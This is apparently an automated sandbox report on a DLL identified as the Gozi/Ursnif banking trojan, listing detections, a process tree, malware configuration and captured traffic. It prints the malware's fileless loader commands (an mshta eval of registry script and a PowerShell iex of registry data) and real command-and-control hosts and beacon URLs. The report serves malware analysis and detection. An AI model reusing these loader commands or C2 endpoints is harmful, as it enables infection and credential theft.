Loading ...

Play interactive tourEdit tour

Analysis Report out.dll

Overview

General Information

Sample Name:out.dll
Analysis ID:343316
MD5:2ff0ff62b5cf7e7097f75a37492f02f8
SHA1:9d60d24299762f4aa7fa71838b58e4e747b95df6
SHA256:09029ff1f317ccfdd92bfd8ae154328748e761231aabb51872e2b1204315f285
Tags:dll

Most interesting Screenshot:

Detection

Gozi Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 7156 cmdline: loaddll32.exe 'C:\Users\user\Desktop\out.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • control.exe (PID: 6328 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 6440 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • iexplore.exe (PID: 6564 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5060 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5760 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17420 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3180 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5564 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5536 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6360 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6236 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 4792 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3940 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 3548 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76B1.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "220", "system": "c5b25fbc4c2f6e09b15c0beea689b7f6hhN", "size": "201280", "crc": "2", "action": "00000000", "id": "1100", "time": "1611371427", "user": "3d11f4f58695dc15e71ab15cd837ada4", "hash": "0x3cfb7f6d", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmpGoziRuleWin32.GoziCCN-CERT
    • 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
    00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmpGoziRuleWin32.GoziCCN-CERT
        • 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
        Click to see the 30 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5536, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline', ProcessId: 6360
        Sigma detected: MSHTA Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5564, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5536
        Sigma detected: Suspicious Csc.exe Source File FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5536, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline', ProcessId: 6360
        Sigma detected: Suspicious Rundll32 ActivityShow sources
        Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6328, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6440

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: loaddll32.exe.7156.0.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "220", "system": "c5b25fbc4c2f6e09b15c0beea689b7f6hhN", "size": "201280", "crc": "2", "action": "00000000", "id": "1100", "time": "1611371427", "user": "3d11f4f58695dc15e71ab15cd837ada4", "hash": "0x3cfb7f6d", "soft": "3"}
        Multi AV Scanner detection for domain / URLShow sources
        Source: c56.lepini.atVirustotal: Detection: 8%Perma Link
        Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
        Source: api10.laptok.atVirustotal: Detection: 10%Perma Link
        Multi AV Scanner detection for submitted fileShow sources
        Source: out.dllVirustotal: Detection: 36%Perma Link
        Source: out.dllReversingLabs: Detection: 45%
        Source: 0.2.loaddll32.exe.1040000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
        Source: 0.2.loaddll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8

        Compliance:

        barindex
        Uses 32bit PE filesShow sources
        Source: out.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
        Uses new MSVCR DllsShow sources
        Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
        Binary contains paths to debug symbolsShow sources
        Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.525112099.00000198C4F60000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.534673965.000001F4112D0000.00000002.00000001.sdmp
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp
        Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
        Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
        Source: Binary string: rundll32.pdb source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
        Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
        Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F87DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0138E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0139888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013A4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Windows\explorer.exeCode function: 32_2_04DEB9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013905EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
        Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
        Source: global trafficHTTP traffic detected: GET /api1/qvYtom7jPMjc/BwFvjaIO4Bv/MbiT4yG6pHfZnV/ZL7sBbHjAqjjVKuOVsR_2/BwLLpnqz5A7VsJpR/VO84dIDbsiOR8iF/cYWxYBw9oC1caEXJgQ/1ZZhS32tE/_2FIQD8vf0Ka7hthdepE/X6LzVrz2dY0Kt9O92Fg/RdwscE4szAaD7AwXR4Vb_2/BkqnQ_2BhW_2F/lBJqoDb5/VV0dcjLelYqerhB5eYzjTAM/cUE3isCvij/iDKviq_2BgRZp2DXp/gw7kl8fvts1f/V1i5c7M51yH/1feNv9xtSWcKia/RzrYlQJt9o9X3mmLIReIH/gGWW8 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /api1/e8J0mG5lwiTYI4icST/XwuRPk1WR/O2_2FLREL3g_2Bdsncic/_2F_2Fow8TpCB9p_2Bj/zmvfM_2BxkF2z6LAdGBQYT/VVFUBTjiLtdmv/z1vsS1b9/h_2Fj_2BxFVp8DBu2Dofcsv/Kv6seO5eeW/D_2BeLNZQPv2reEOP/gDxjD6y_2Ba9/4irkQZqxmvf/9gg2SCAj4TalZx/1SLIP2InPcQLc5ZsM9f5y/_2FMOWQ6jsIMXMBN/hDufArlyeEDIAOr/Sco7UD5GaVWTjyRv0y/uryOt5Vso/0DF8H9bz3K9Q8xTOA2GN/nbXSkM052l7YJ25GJNP/F1evg5adcZfk_2FVPUzqLE/34tuFQrR HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/ylKE7k3_2BbdPjjCSjH/Bhzm2iLbw_2BlZFjfzdu9K/QNeuz5NJoJPdd/3RpNk4gX/684IFalzbokAf38NKCQoGB3/giv4u8aUar/1Y3IwJEGTTwG7vgZb/hfQjMo3huzsc/_2B2kxzS9SV/aDAgJWuWGRyIv3/OVgklOZtJCDxn5mV_2BOp/ZWvDrGcJhzM9JQCv/ytbaFIu03cT7HsQ/LvD4iOQPI8imqvRWlT/lJ9Iessga/osAc16h46CUOpOSEj/Yy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
        Source: global trafficHTTP traffic detected: GET /api1/xnHAsL1d/fsXvh_2FqVkJzjJvIXVP386/sdHFYJjUzJ/mq43UZwYK4FgDCOnc/d6cqEgrS6hS0/yp4nDUlwnDa/ddfbdz56Dh1hTq/LrfxBoj9_2FbR1C4Ne_2F/szE2P1qBc4BfGVsX/nGM5l8QMlmw5kmi/QVG_2BIrV4GqfgGs53/ZvRn1P0u9/8VUaGimT1Vpnn1Eb2u3U/bOn04R5ChWboXWbTtj8/m4lBRSaAxwnyjeEKdpyj8r/iXLsJGMs8uSTY/pDl9P04P/3WN74fdSL4m2h4Em0_2BNdG/z7s8dMlVkI/qqzG94ApmaqBEZGQ7/8vA HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
        Source: unknownDNS traffic detected: queries for: api10.laptok.at
        Source: unknownHTTP traffic detected: POST /api1/PwElXtu1a1ZKEBW8VI4ILA6/C13ZlCGLPf/xbMloqVHEi2N8EvPw/onOYysTw787u/lNsSQdb7adO/WTcHzLbVAjUFsU/yNI28gR4HNSgUrzaABrB_/2Ff5rClIFDKCPamX/LhKcGHTdcpy3Q1x/C_2FUBl8MXyD7rFF5y/_2BqpwBxk/tzgRETfStG7sL50DxVPi/KudBEmh7ELXBUurmd1W/HnwD8_2F7x9j58GCY_2BCE/FHx8MfU3Gbyrl/GAR0LJZU/2CBuYYB3OJmIjTAisk7a2gA/8gGq_2B5fD/hW5rhKLd6LFogxF1_/2BMayi7nxB4/VTo4 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: app.crasa.at
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Jan 2021 18:10:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
        Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
        Source: explorer.exe, 00000020.00000000.543025463.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/y
        Source: explorer.exe, 00000020.00000000.563196482.0000000008455000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/ylKE7k
        Source: explorer.exe, 00000020.00000000.558064670.00000000062E0000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/e8J0mG5lwiTYI4icST/XwuRPk1WR/O2_2FLREL3g_2Bdsncic/_2F_2Fow8TpCB9p_2Bj/zm
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
        Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
